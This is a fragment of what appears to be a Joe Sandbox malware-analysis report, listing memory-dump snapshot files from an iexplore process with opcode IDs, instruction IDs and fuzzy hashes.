                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9b204f8152828814bd7f91827c63b0b97abeef89b9c6ffe1fb4272908f2cb9e
                                  • Instruction ID: 66db39c250f0e304fbab4fe315cb84d1aa39376402cd44a914b306f2ea00671d
                                  • Opcode Fuzzy Hash: f9b204f8152828814bd7f91827c63b0b97abeef89b9c6ffe1fb4272908f2cb9e
                                  • Instruction Fuzzy Hash: 6590026124180C92E140B15884547070046C7D0601F55C021A00255A8D87168A6566B2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 177f57756b40837be1815247275ca22e9cd26f4eaeb03336550ac42205c6d1a6
                                  • Instruction ID: feacc49b547413dd789cc97d2425765defd2429dc071f76e52531207e02f0e2e
                                  • Opcode Fuzzy Hash: 177f57756b40837be1815247275ca22e9cd26f4eaeb03336550ac42205c6d1a6
                                  • Instruction Fuzzy Hash: 1C813A76D00269DBDB21DB54CC44BEEB7B8AF48710F0445EAEA19B7680D7309E80DFA4